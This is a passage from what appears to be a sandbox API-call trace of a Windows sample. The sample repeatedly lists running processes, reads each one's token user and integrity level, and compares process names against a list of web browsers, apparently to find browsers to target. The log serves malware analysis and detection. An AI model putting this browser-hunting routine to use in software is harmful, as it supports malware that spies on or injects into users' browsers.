lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="explorer.exe") returned 1 [0545.005] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="explorer.exe") returned 1 [0545.005] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0 [0545.005] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x298 [0545.005] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x29c) returned 1 [0545.005] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0545.005] GetLastError () returned 0x7a [0545.005] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x40fe68, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe68, ReturnLength=0x20f7ac) returned 1 [0545.005] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0545.005] CloseHandle (hObject=0x29c) returned 1 [0545.005] CloseHandle (hObject=0x298) returned 1 [0545.006] GetLengthSid (pSid=0x40fe70*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0545.006] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x29c) returned 1 [0545.006] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0545.006] GetLastError () returned 0x7a [0545.006] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x41b188, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b188, ReturnLength=0x20f7d8) returned 1 [0545.006] GetSidSubAuthorityCount (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b191 [0545.006] GetSidSubAuthority (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b198 [0545.006] lstrcmpiW (lpString1="firefox.exe", lpString2="ONENOTEM.EXE") returned -1 [0545.006] lstrcmpiW (lpString1="chrome.exe", lpString2="ONENOTEM.EXE") returned -1 [0545.007] lstrcmpiW (lpString1="opera.exe", lpString2="ONENOTEM.EXE") returned 1 [0545.007] lstrcmpiW (lpString1="iexplore.exe", lpString2="ONENOTEM.EXE") returned -1 [0545.007] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="ONENOTEM.EXE") returned -1 [0545.007] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="ONENOTEM.EXE") returned -1 [0545.007] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x118) returned 0x0 [0545.007] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x724) returned 0x0 [0545.007] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0x0 [0545.007] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0x298 [0545.007] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x29c) returned 1 [0545.007] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0545.008] GetLastError () returned 0x7a [0545.008] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x40fe68, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe68, ReturnLength=0x20f7ac) returned 1 [0545.008] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0545.008] CloseHandle (hObject=0x29c) returned 1 [0545.008] CloseHandle (hObject=0x298) returned 1 [0545.008] GetLengthSid (pSid=0x40fe70*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0545.008] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x29c) returned 1 [0545.008] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0545.008] GetLastError () returned 0x7a [0545.009] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x41b188, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b188, ReturnLength=0x20f7d8) returned 1 [0545.009] GetSidSubAuthorityCount (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b191 [0545.009] GetSidSubAuthority (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b198 [0545.009] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0545.009] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0545.009] lstrcmpiW (lpString1="opera.exe", lpString2="svchost.exe") returned -1 [0545.010] lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0545.010] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="svchost.exe") returned -1 [0545.010] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="svchost.exe") returned -1 [0545.010] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x640) returned 0x0 [0545.010] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x610) returned 0x0 [0545.010] VirtualFree (lpAddress=0x370000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0545.011] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x7d0) returned 0x102 [0547.021] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x20f7fc | out: SystemInformation=0x0, ResultLength=0x20f7fc*=0xa2c8) returned 0xc0000004 [0547.022] VirtualAlloc (lpAddress=0x0, dwSize=0xb2c8, flAllocationType=0x1000, flProtect=0x4) returned 0x370000 [0547.022] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x370000, Length=0xb2c8, ResultLength=0x0 | out: SystemInformation=0x370000, ResultLength=0x0) returned 0x0 [0547.023] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0547.024] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0547.024] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0547.024] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0547.024] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0547.024] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x184) returned 0x0 [0547.024] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1ac) returned 0x0 [0547.024] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d8) returned 0x0 [0547.024] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e0) returned 0x0 [0547.024] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e8) returned 0x0 [0547.025] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0547.025] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x294) returned 0x0 [0547.025] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c4) returned 0x0 [0547.025] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x32c) returned 0x0 [0547.025] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x358) returned 0x0 [0547.025] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x39c) returned 0x0 [0547.025] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3e8) returned 0x0 [0547.025] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0 [0547.025] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x304) returned 0x0 [0547.025] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x43c) returned 0x0 [0547.026] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4c8) returned 0x298 [0547.026] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x29c) returned 1 [0547.026] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0547.026] GetLastError () returned 0x7a [0547.026] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x40fe68, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe68, ReturnLength=0x20f7ac) returned 1 [0547.026] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0547.026] CloseHandle (hObject=0x29c) returned 1 [0547.026] CloseHandle (hObject=0x298) returned 1 [0547.026] GetLengthSid (pSid=0x40fe70*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0547.026] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x29c) returned 1 [0547.026] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0547.027] GetLastError () returned 0x7a [0547.027] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x41b188, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b188, ReturnLength=0x20f7d8) returned 1 [0547.027] GetSidSubAuthorityCount (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b191 [0547.027] GetSidSubAuthority (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b198 [0547.027] lstrcmpiW (lpString1="firefox.exe", lpString2="taskhost.exe") returned -1 [0547.027] lstrcmpiW (lpString1="chrome.exe", lpString2="taskhost.exe") returned -1 [0547.027] lstrcmpiW (lpString1="opera.exe", lpString2="taskhost.exe") returned -1 [0547.027] lstrcmpiW (lpString1="iexplore.exe", lpString2="taskhost.exe") returned -1 [0547.027] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="taskhost.exe") returned -1 [0547.027] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="taskhost.exe") returned -1 [0547.027] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4f0) returned 0x0 [0547.027] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x558) returned 0x298 [0547.027] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x29c) returned 1 [0547.027] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0547.027] GetLastError () returned 0x7a [0547.027] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x40fe68, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe68, ReturnLength=0x20f7ac) returned 1 [0547.027] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0547.027] CloseHandle (hObject=0x29c) returned 1 [0547.027] CloseHandle (hObject=0x298) returned 1 [0547.027] GetLengthSid (pSid=0x40fe70*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0547.027] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x29c) returned 1 [0547.027] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0547.027] GetLastError () returned 0x7a [0547.027] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x41b188, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b188, ReturnLength=0x20f7d8) returned 1 [0547.027] GetSidSubAuthorityCount (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b191 [0547.027] GetSidSubAuthority (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b198 [0547.027] lstrcmpiW (lpString1="firefox.exe", lpString2="dwm.exe") returned 1 [0547.027] lstrcmpiW (lpString1="chrome.exe", lpString2="dwm.exe") returned -1 [0547.027] lstrcmpiW (lpString1="opera.exe", lpString2="dwm.exe") returned 1 [0547.027] lstrcmpiW (lpString1="iexplore.exe", lpString2="dwm.exe") returned 1 [0547.027] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="dwm.exe") returned 1 [0547.027] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="dwm.exe") returned 1 [0547.027] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x570) returned 0x298 [0547.027] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x29c) returned 1 [0547.027] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0547.027] GetLastError () returned 0x7a [0547.027] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x40fe68, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe68, ReturnLength=0x20f7ac) returned 1 [0547.027] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0547.027] CloseHandle (hObject=0x29c) returned 1 [0547.028] CloseHandle (hObject=0x298) returned 1 [0547.028] GetLengthSid (pSid=0x40fe70*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0547.028] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x29c) returned 1 [0547.028] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0547.028] GetLastError () returned 0x7a [0547.028] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x41b188, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b188, ReturnLength=0x20f7d8) returned 1 [0547.028] GetSidSubAuthorityCount (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b191 [0547.028] GetSidSubAuthority (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b198 [0547.028] lstrcmpiW (lpString1="firefox.exe", lpString2="explorer.exe") returned 1 [0547.028] lstrcmpiW (lpString1="chrome.exe", lpString2="explorer.exe") returned -1 [0547.028] lstrcmpiW (lpString1="opera.exe", lpString2="explorer.exe") returned 1 [0547.028] lstrcmpiW (lpString1="iexplore.exe", lpString2="explorer.exe") returned 1 [0547.028] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="explorer.exe") returned 1 [0547.028] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="explorer.exe") returned 1 [0547.028] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0 [0547.028] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x298 [0547.028] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x29c) returned 1 [0547.028] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0547.028] GetLastError () returned 0x7a [0547.028] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x40fe68, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe68, ReturnLength=0x20f7ac) returned 1 [0547.028] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0547.028] CloseHandle (hObject=0x29c) returned 1 [0547.028] CloseHandle (hObject=0x298) returned 1 [0547.028] GetLengthSid (pSid=0x40fe70*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0547.028] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x29c) returned 1 [0547.028] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0547.028] GetLastError () returned 0x7a [0547.028] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x41b188, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b188, ReturnLength=0x20f7d8) returned 1 [0547.028] GetSidSubAuthorityCount (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b191 [0547.028] GetSidSubAuthority (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b198 [0547.028] lstrcmpiW (lpString1="firefox.exe", lpString2="ONENOTEM.EXE") returned -1 [0547.028] lstrcmpiW (lpString1="chrome.exe", lpString2="ONENOTEM.EXE") returned -1 [0547.028] lstrcmpiW (lpString1="opera.exe", lpString2="ONENOTEM.EXE") returned 1 [0547.028] lstrcmpiW (lpString1="iexplore.exe", lpString2="ONENOTEM.EXE") returned -1 [0547.028] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="ONENOTEM.EXE") returned -1 [0547.028] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="ONENOTEM.EXE") returned -1 [0547.028] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x118) returned 0x0 [0547.028] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x724) returned 0x0 [0547.028] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0x0 [0547.029] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0x298 [0547.029] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x29c) returned 1 [0547.029] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0547.029] GetLastError () returned 0x7a [0547.029] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x40fe68, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe68, ReturnLength=0x20f7ac) returned 1 [0547.029] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0547.029] CloseHandle (hObject=0x29c) returned 1 [0547.029] CloseHandle (hObject=0x298) returned 1 [0547.029] GetLengthSid (pSid=0x40fe70*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0547.029] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x29c) returned 1 [0547.029] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0547.029] GetLastError () returned 0x7a [0547.029] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x41b188, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b188, ReturnLength=0x20f7d8) returned 1 [0547.029] GetSidSubAuthorityCount (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b191 [0547.029] GetSidSubAuthority (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b198 [0547.029] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0547.029] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0547.029] lstrcmpiW (lpString1="opera.exe", lpString2="svchost.exe") returned -1 [0547.029] lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0547.029] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="svchost.exe") returned -1 [0547.029] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="svchost.exe") returned -1 [0547.029] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x640) returned 0x0 [0547.029] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x610) returned 0x0 [0547.029] VirtualFree (lpAddress=0x370000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0547.029] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x7d0) returned 0x102 [0549.038] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x20f7fc | out: SystemInformation=0x0, ResultLength=0x20f7fc*=0xa278) returned 0xc0000004 [0549.038] VirtualAlloc (lpAddress=0x0, dwSize=0xb278, flAllocationType=0x1000, flProtect=0x4) returned 0x370000 [0549.039] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x370000, Length=0xb278, ResultLength=0x0 | out: SystemInformation=0x370000, ResultLength=0x0) returned 0x0 [0549.040] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0549.040] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0549.040] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0549.040] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0549.040] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0549.041] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x184) returned 0x0 [0549.041] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1ac) returned 0x0 [0549.041] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d8) returned 0x0 [0549.041] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e0) returned 0x0 [0549.041] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e8) returned 0x0 [0549.041] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0549.041] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x294) returned 0x0 [0549.041] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c4) returned 0x0 [0549.041] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x32c) returned 0x0 [0549.041] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x358) returned 0x0 [0549.042] 